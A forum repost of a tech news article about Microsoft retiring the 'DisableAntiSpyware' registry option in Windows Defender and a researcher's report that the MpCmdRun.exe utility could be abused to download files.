Author Topic: Microsoft quietly makes huge change to Windows 10’s antivirus tool  (Read 194 times)

Offline javajolt

  • Administrator
  • Hero Member
  • *****
  • Posts: 35126
  • Gender: Male
  • I Do Windows
    • windows10newsinfo.com


Recently, it was discovered that Microsoft is no longer allowing consumers to disable Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lighted on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the whole controversy.

Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via Windows Registry. However, Microsoft says it has retired the legacy option to disable the antivirus because it no longer makes any sense in the latest version of Defender.

Windows Defender is designed to turn off automatically whenever users try to install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft.

‘DisableAntiSpyware’ is designed only for IT pros and admins to disable the antivirus engine whenever they need to install their own security product.



“The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted.

By retiring this feature, Microsoft will also prevent attackers from turning off Windows Defender.

Windows Defender can now download files

A report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has been updated with a new feature that could be abused by attackers to download malware from the internet.

According to security researcher Askar, Windows Defender has been updated with a new command-line feature called “MpCmdRun.exe”, otherwise known as Microsoft Antimalware Service Command Line Utility.

Security researcher Askar claims that these changes to the Windows Defender-powered command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). In other words, hackers can abuse these binaries and download any file from the internet, including malware.

It also means that users will be able to use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw as files are still checked by Windows Defender after you finish the download using the command-line tool.

In theory, Windows Defender tool can’t be used to download any malware that could infect your system, but this is an odd change, and security researchers believe that it could be abused.

source